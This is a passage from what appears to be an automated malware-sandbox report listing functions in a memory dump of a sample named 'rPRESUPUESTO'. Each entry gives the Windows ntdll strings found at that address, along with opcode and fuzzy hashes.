                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0180855E
                                                • @, xrefs: 01808591
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01808421
                                                • LdrpInitializeProcess, xrefs: 01808422
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: 112b522e0300cfc1e109025b136f4ddd3ef57034190e24e644f16a8b44e45bcc
                                                • Instruction ID: 85c9f9957d946ff797bfb9efb9ee315e17fb913ee333e28746313eb46ae99a20
                                                • Opcode Fuzzy Hash: 112b522e0300cfc1e109025b136f4ddd3ef57034190e24e644f16a8b44e45bcc
                                                • Instruction Fuzzy Hash: 34919E71508749AFE722DF65CC81EABBAECBF89744F40092EF684D2195E730DA44CB52
                                                Function 0180273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018422B6
                                                • SXS: %s() passed the empty activation context, xrefs: 018421DE
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018421D9, 018422B1
                                                • .Local, xrefs: 018028D8
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: 9f6ca3a8f1e369330c2edc3b58179a74be4a0db8b86976d5f44b850d5b093e24
                                                • Instruction ID: 6beb8abea679f5daaaaf3913a653aba8cb9c5b0af4cbff6c90653681160d0fc9
                                                • Opcode Fuzzy Hash: 9f6ca3a8f1e369330c2edc3b58179a74be4a0db8b86976d5f44b850d5b093e24
                                                • Instruction Fuzzy Hash: 6DA1B13590022D9BDB66CF68DC88BA9B7B6BF58354F1441E9E908E7291D7709F80CF90
                                                Function 01804AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 0184342A
                                                • RtlDeactivateActivationContext, xrefs: 01843425, 01843432, 01843451
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01843437
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01843456
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                • Opcode ID: b11edeec3a24de0c6fa1509cca91961bf52b98be9215595f16fe80faa22e0c61
                                                • Instruction ID: cf076c10e61f3d41288b64a334eb5df46c98a9ed000c47b64b895600b6cfd3ca
                                                • Opcode Fuzzy Hash: b11edeec3a24de0c6fa1509cca91961bf52b98be9215595f16fe80faa22e0c61
                                                • Instruction Fuzzy Hash: 29612672640B1A9BD723CF1CC891B6AB7E5FFA0B50F148519EE55DB281CB30EA41CB91
                                                Function 017D64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                Download Yara Rule
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01830FE5
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01831028
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018310AE
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0183106B
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: 77f7e3dfa060dba90671552c1cb3285363aaf1204e2c74e4f032096ee4bbca96
                                                • Instruction ID: 18536e09284054216c9be672a3c36bdfcca8257be9c7d8b7bef581b87e1c7cba
                                                • Opcode Fuzzy Hash: 77f7e3dfa060dba90671552c1cb3285363aaf1204e2c74e4f032096ee4bbca96
                                                • Instruction Fuzzy Hash: 9471D2B19043099FCB21DF18C884B9BBFA9EF95764F540468F9498B24AD734D6C8CBD2
                                                Function 017F245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0183A992
                                                • LdrpDynamicShimModule, xrefs: 0183A998
                                                • apphelp.dll, xrefs: 017F2462
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0183A9A2
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: 5ec33cff8cf4030134c0f0ba19603a49379e183a111b1f1e77944bae61b67ead
                                                • Instruction ID: 9c46732aaaecb57ad4c470b73188c0ecd5935b991b324b8a1a6178079674831f
                                                • Opcode Fuzzy Hash: 5ec33cff8cf4030134c0f0ba19603a49379e183a111b1f1e77944bae61b67ead
                                                • Instruction Fuzzy Hash: CA313572A00201AFDB359F5D9885ABABBB5FBC0B04F29406DE950E7345D7B09B42CB80
                                                Function 017E29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP[%wZ]: , xrefs: 017E3255
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017E327D
                                                • HEAP: , xrefs: 017E3264
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                • Opcode ID: 18e7a58c45b84d6319a6814a412a8d65329212d7a1eedbc4d621670ffbe1dc1b
                                                • Instruction ID: 46cf24c25fde5643f41970d29fcbd8f25a06ca4bbc96ec8f5972b8f2c6eee937
                                                • Opcode Fuzzy Hash: 18e7a58c45b84d6319a6814a412a8d65329212d7a1eedbc4d621670ffbe1dc1b
                                                • Instruction Fuzzy Hash: 5792BD71A046499FEB25CF68C448BAEFBF5FF48300F188099E959AB392D735A941CF50
                                                Function 017E0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: bc919dac12b06bf190528f0b220d9329fc9566e274a57d7b8583b1c3e2ff2da4
                                                • Instruction ID: 871ae6b16bbc5ef441b4f4dab3321d323320f66dd190b280494d35129d76da29
                                                • Opcode Fuzzy Hash: bc919dac12b06bf190528f0b220d9329fc9566e274a57d7b8583b1c3e2ff2da4
                                                • Instruction Fuzzy Hash: 79F18B70700606DFEB25CF68C898B6AF7F5FB88304F1841A8E556DB385D774AA81CB91
                                                Function 017F6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                • Opcode ID: 08bb6d8ebdcc87d4ee68aca06bf14751efa69a10c12eb44f8d9af09b20102bc4
                                                • Instruction ID: 370839221f5d0c809cdd9665ef5d0fbf8c59a46626fe2fc279d15542106a8009
                                                • Opcode Fuzzy Hash: 08bb6d8ebdcc87d4ee68aca06bf14751efa69a10c12eb44f8d9af09b20102bc4
                                                • Instruction Fuzzy Hash: 0AC25C716083419FEB29CF28C841BABFBE5AF88714F04896DFA89D7341D734D9458B92
                                                Function 017CA197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 5ce5e1468482c9ee1f19307cceffa7fab7131495a041c3950ae779c6c76ba18f
                                                • Instruction ID: 674fe861b1c696b2adf89a14c2159ccc0ca4655a21370e1c54c2248525ba49ca
                                                • Opcode Fuzzy Hash: 5ce5e1468482c9ee1f19307cceffa7fab7131495a041c3950ae779c6c76ba18f
                                                • Instruction Fuzzy Hash: 09A13C719116399BDB229B68CC88BAEB7B9EF44710F1041E9DA09E7250D7359FC4CF50
                                                Function 017F0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                Download Yara Rule
                                                Strings
                                                • Failed to allocated memory for shimmed module list, xrefs: 0183A10F
                                                • minkernel\ntdll\ldrinit.c, xrefs: 0183A121
                                                • LdrpCheckModule, xrefs: 0183A117
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-161242083
                                                • Opcode ID: c06d2c9e01f6ba784e01d0fa52054cba5cec7d69d86530bfe4a0490681b16e46
                                                • Instruction ID: 1c0a139f46e718d5779cd9750cc84b39baba32cf7e5521263dae0de9fe7f9111
                                                • Opcode Fuzzy Hash: c06d2c9e01f6ba784e01d0fa52054cba5cec7d69d86530bfe4a0490681b16e46
                                                • Instruction Fuzzy Hash: 5271BB71A002059FDB29DF68C985BBEF7F5EB84704F18406DEA42E7356E634AA41CB81
                                                Function 017E0A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-1334570610
                                                • Opcode ID: dc84b77b294265dcae5bf7fdcb1fe1477e7311b96df5c8e5638fea6c3e2ec766
                                                • Instruction ID: 3e0fc326a6a59bccf73e0298f71f79b19f128d088ccf62d36749c44d337837eb
                                                • Opcode Fuzzy Hash: dc84b77b294265dcae5bf7fdcb1fe1477e7311b96df5c8e5638fea6c3e2ec766
                                                • Instruction Fuzzy Hash: 5B616C707003059FDB29CF28C888B6AFBE5FF49704F188599E459CB296D7B0E981CB91
                                                Function 0180C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                Download Yara Rule
                                                Strings
                                                • Failed to reallocate the system dirs string !, xrefs: 018482D7
                                                • minkernel\ntdll\ldrinit.c, xrefs: 018482E8
                                                • LdrpInitializePerUserWindowsDirectory, xrefs: 018482DE
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1783798831
                                                • Opcode ID: 5e3e0ce0fe42213e2d1f5b147c3d24a9feca8d130271c35786fdc8e5363f394f
                                                • Instruction ID: 29a9135d5f3840571756d0af9edc8644566f3c2d22cdb8d70284f7a2a4cf8b2a
                                                • Opcode Fuzzy Hash: 5e3e0ce0fe42213e2d1f5b147c3d24a9feca8d130271c35786fdc8e5363f394f
                                                • Instruction Fuzzy Hash: EA41E4B1544309AFC722EF6CDC48B5BB7E8EF48754F104A6AF944D3295EB70DA008B91
                                                Function 0188C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                Download Yara Rule
                                                Strings
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0188C1C5
                                                • @, xrefs: 0188C1F1
                                                • PreferredUILanguages, xrefs: 0188C212
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                • API String ID: 0-2968386058
                                                • Opcode ID: 4b86c40a97fb99d0bda84d7c5872a5106e33e6842192f08cceca66491e42a1aa
                                                • Instruction ID: b7d75ceb9d69d3ec98190a7e3b0396271731734047108d559c84b640ead10bab
                                                • Opcode Fuzzy Hash: 4b86c40a97fb99d0bda84d7c5872a5106e33e6842192f08cceca66491e42a1aa
                                                • Instruction Fuzzy Hash: 6E416272A00219EBDB11EAD8C895FEEBBB8AB54704F14416AE609F7284D7749B44CB60
                                                Function 01864144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                • API String ID: 0-1373925480
                                                • Opcode ID: 794ac189471dd637eff2fd39360cc1bf586577416dcf7adefe6f7ebc4b878668
                                                • Instruction ID: 3035b421d691819514b56174e22b18e32c7a22730be6b3c6b73b116ab1f0d93c
                                                • Opcode Fuzzy Hash: 794ac189471dd637eff2fd39360cc1bf586577416dcf7adefe6f7ebc4b878668
                                                • Instruction Fuzzy Hash: FF413432A00648CBEB26DBE9C844BADBBFDFF55344F24045ADA01EB781DB358A41CB11
                                                Function 01854755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrpCheckRedirection, xrefs: 0185488F
                                                • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01854888
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 01854899
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-3154609507
                                                • Opcode ID: 88f8b80bb76349c9d81a18ad7c88bb0731fa37053f393b7fa3f47d8b4ee5e04f
                                                • Instruction ID: 1dfadcafc4037cd1500415f6c4a346eb2e904fcb6413b527b9b5ea03dc6d6117
                                                • Opcode Fuzzy Hash: 88f8b80bb76349c9d81a18ad7c88bb0731fa37053f393b7fa3f47d8b4ee5e04f
                                                • Instruction Fuzzy Hash: E941F236A042559FCBA1CE2DD840A26BBE4FF89B54F06066DED48D7311F731EA80CB81
                                                Function 017E0BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-2558761708
                                                • Opcode ID: 28d47169e6aa3ca9ea555ba45ffb736b1ef4f5c4bfbed832aaff8ceef635104f
                                                • Instruction ID: 1dc05f5333da453d04da1150f1fb4934229cbbd1952d3da6af9b03b986c8b8d9
                                                • Opcode Fuzzy Hash: 28d47169e6aa3ca9ea555ba45ffb736b1ef4f5c4bfbed832aaff8ceef635104f
                                                • Instruction Fuzzy Hash: 0D11DCB1314102DFDB2DDA18C899B6AF3E4EF84B1AF18816DF406CB255DB70E941C791
                                                Function 018520DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 01852104
                                                • LdrpInitializationFailure, xrefs: 018520FA
                                                • Process initialization failed with status 0x%08lx, xrefs: 018520F3
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-2986994758
                                                • Opcode ID: 479575a4543021ce836316820146b9057b22d4e9d8a192b17b155e88de66f722
                                                • Instruction ID: 89e892586f8d799259fcb9d75b1343f0949d1764a73b5c3460c66690e0350e06
                                                • Opcode Fuzzy Hash: 479575a4543021ce836316820146b9057b22d4e9d8a192b17b155e88de66f722
                                                • Instruction Fuzzy Hash: 24F0C275680748BFE724E64DDC56FDA7769FB40B54F540069FA00AB286DAB0BB00CA91
                                                Function 017E03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                Download Yara Rule
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: #%u
                                                • API String ID: 48624451-232158463
                                                • Opcode ID: a333961571e2970837bc67cecef485f85cf9b4d56d84d915988e7c165ba540d4
                                                • Instruction ID: 289d1c503e140239780ede4333fd7dcc6c981cb03f27f573601f179426c48eee
                                                • Opcode Fuzzy Hash: a333961571e2970837bc67cecef485f85cf9b4d56d84d915988e7c165ba540d4
                                                • Instruction Fuzzy Hash: 68714971A0014A9FDB01DFA8C994FAEB7F8FF48704F144065E905E7251EA34EE41CBA1
                                                Function 017DA9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                Download Yara Rule
                                                Strings
                                                • LdrResSearchResource Enter, xrefs: 017DAA13
                                                • LdrResSearchResource Exit, xrefs: 017DAA25
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                • API String ID: 0-4066393604
                                                • Opcode ID: 2c101bcd62d75fefb845f7fecc420954d2d350e7e1e5bdea2bcc1352a78533a0
                                                • Instruction ID: c03aca5edd1b2391bed0d8644ab5133e648256a0f7a6b6e772ef18c847919d3c
                                                • Opcode Fuzzy Hash: 2c101bcd62d75fefb845f7fecc420954d2d350e7e1e5bdea2bcc1352a78533a0
                                                • Instruction Fuzzy Hash: 57E18F71A0021DAFEB22CF98C980BAEFBBABF94310F144566ED01E7251D7749A41CB51
                                                Function 0189A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: `$`
                                                • API String ID: 0-197956300
                                                • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction ID: 4f0af97c8f1dd4bdc7df49a205b66cc396c1733a28986a73a6db4298164343f0
                                                • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                • Instruction Fuzzy Hash: 83C1C3312043469BEB29CF28C845B6BBBE5BFC4318F184A2DF696C7291D775D605CB82
                                                Function 0184E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Legacy$UEFI
                                                • API String ID: 2994545307-634100481
                                                • Opcode ID: c6829bb13e9e6d7659df5aad1882cbc8221c496676b2de4a30da872eb0793f56
                                                • Instruction ID: 31ade37f74386be67be2dafbb75c86b2957df036f3796f39ce61960eb1fb6503
                                                • Opcode Fuzzy Hash: c6829bb13e9e6d7659df5aad1882cbc8221c496676b2de4a30da872eb0793f56
                                                • Instruction Fuzzy Hash: 5A615E71E0031D9FEB15DFA8C840BADBBB9FB48704F54406DE649EB251DB35AA00CB50
                                                Function 018743D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$MUI
                                                • API String ID: 0-17815947
                                                • Opcode ID: 557f6fdedddb8872cfddc146d58cc8dfe012390d675534bc09cf3255c47b8b2b
                                                • Instruction ID: 6f81f6072f5dc845dd0d013ce70ba92182b9a60a047cff6a7fc34c3b1fb5fec5
                                                • Opcode Fuzzy Hash: 557f6fdedddb8872cfddc146d58cc8dfe012390d675534bc09cf3255c47b8b2b
                                                • Instruction Fuzzy Hash: FA5107B1E0021DAEDB11DFA9CC84AEEBBBDEB48754F100529E611F7294D7309A45CB60
                                                Function 017D04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                Download Yara Rule
                                                Strings
                                                • kLsE, xrefs: 017D0540
                                                • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017D063D
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                • API String ID: 0-2547482624
                                                • Opcode ID: 8594278cd48478c818caf22f08dd89e1702b1379e8e4e46e40249bd8cb58d226
                                                • Instruction ID: 1192086a0967aafd97b65daa31b6e92244d5f85baa1f73309cf16d95dd6291ea
                                                • Opcode Fuzzy Hash: 8594278cd48478c818caf22f08dd89e1702b1379e8e4e46e40249bd8cb58d226
                                                • Instruction Fuzzy Hash: C051AC7150474A8FD724EF28C444AA7FBF4AF84314F24583EFAAA87241E770D545CBA2
                                                Function 017DA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                Download Yara Rule
                                                Strings
                                                • RtlpResUltimateFallbackInfo Exit, xrefs: 017DA309
                                                • RtlpResUltimateFallbackInfo Enter, xrefs: 017DA2FB
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                • API String ID: 0-2876891731
                                                • Opcode ID: b99216c2e03c85c7475293dfaa2b15e1b566e9b5e9371f89e3b72534cd06199b
                                                • Instruction ID: 81719a24dceb63af4a48224a341ba2028937857010a61b463511dda1231519ad
                                                • Opcode Fuzzy Hash: b99216c2e03c85c7475293dfaa2b15e1b566e9b5e9371f89e3b72534cd06199b
                                                • Instruction Fuzzy Hash: B941B131A04649DBDB15CF5DC844B6EBBF6FF85704F2840A9E900DB291EBB5DA40CB90
                                                Function 0180A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID: Cleanup Group$Threadpool!
                                                • API String ID: 2994545307-4008356553
                                                • Opcode ID: e556f63ea5bfb5d4c4101e9b98508dd8e9cb047d5689ad205ec2c9a02cfa6358
                                                • Instruction ID: 44463e895dd5beb86a76dd7c0d67d143f0ba8ef85861b9b52d07e8aa9b6af25c
                                                • Opcode Fuzzy Hash: e556f63ea5bfb5d4c4101e9b98508dd8e9cb047d5689ad205ec2c9a02cfa6358
                                                • Instruction Fuzzy Hash: 7001D1B2240708AFD352DF14CD45F2677F8EB85B15F018939A658CB190E334DA04CB46
                                                Function 017DC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000005.00000002.2328716564.00000000017A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017A0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_5_2_17a0000_rPRESUPUESTO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: MUI
                                                • API String ID: 0-1339004836
                                                • Opcode ID: fe69640791552b9979754f966a0b27ab339f7b09b9558d2037f88c5101776590
                                                • Instruction ID: a3d2947250474db326745020d7b17bebba0e03b3c7aea5c56d933742cc2dd280
                                                • Opcode Fuzzy Hash: fe69640791552b9979754f966a0b27ab339f7b09b9558d2037f88c5101776590
